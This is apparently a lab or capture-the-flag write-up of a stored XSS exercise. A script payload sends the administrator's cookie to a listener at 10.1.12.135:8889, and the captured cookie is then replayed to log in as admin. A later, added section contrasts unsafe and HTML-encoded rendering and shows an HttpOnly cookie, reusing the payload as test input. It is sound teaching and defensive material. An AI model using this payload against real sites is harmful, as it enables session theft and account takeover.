This XSS exercise mainly focuses on obtaining the administrator's cookie and then forging that cookie to log in as the administrator.
The interface is as follows:
Click on "Test" in the above image to leave a message.
Prepare the xss payload to obtain the cookie:
<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>
Start the web service to receive the cookie:
python -m SimpleHTTPServer 8889
Write the payload into the input box.
Click "Submit Query".
Wait.
Check whether the Python server has received the cookie.
Copy the cookie.
1acb0fb952b3caaf1ab7277511923138
Replace the cookie value.
Click "Edit" to replace.
Refresh the page and click "Admin".
Successfully logged in and obtained the key.
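The steps above succeed because the message board renders stored input as HTML and the session cookie is readable from script. The following added example (not part of the original write-up) shows the unsafe rendering beside an output-encoded one, plus a session cookie issued with HttpOnly. The function names, the cookie name `session` and the sample session id are assumptions.

```javascript
// Added example: why the stored message runs in the administrator's browser,
// and the two server-side changes that stop the cookie from being read.
// All function names and the cookie name "session" are assumptions.

// Vulnerable rendering: the stored message is concatenated into HTML as-is,
// so a <script> element inside it executes when the page is viewed.
function renderMessageUnsafe(message) {
  return '<div class="message">' + message + '</div>';
}

// HTML-encode the five characters that can change the parsing context.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened rendering: the message is displayed as text, never parsed as markup.
function renderMessageSafe(message) {
  return '<div class="message">' + escapeHtml(message) + '</div>';
}

// Defence in depth: HttpOnly hides the cookie from document.cookie, so an
// injected script cannot read it. Secure and SameSite limit where it is sent.
function sessionCookieHeader(sessionId) {
  if (!/^[A-Za-z0-9]+$/.test(sessionId)) {
    throw new Error('unexpected characters in session id');
  }
  return 'session=' + sessionId + '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

// The message submitted in the write-up, used here as test input.
const storedMessage =
  '<script>\n' +
  'document.write(\'<img src="http://10.1.12.135:8889?\'+ escape(document.cookie) + \'">\')\n' +
  '</script>';

console.log(renderMessageUnsafe(storedMessage)); // still contains a live <script> element
console.log(renderMessageSafe(storedMessage));   // same text, all markup encoded
console.log(sessionCookieHeader('0123456789abcdef')); // constructed session id
```

Output encoding removes the injection point; HttpOnly limits the damage if another injection point is missed.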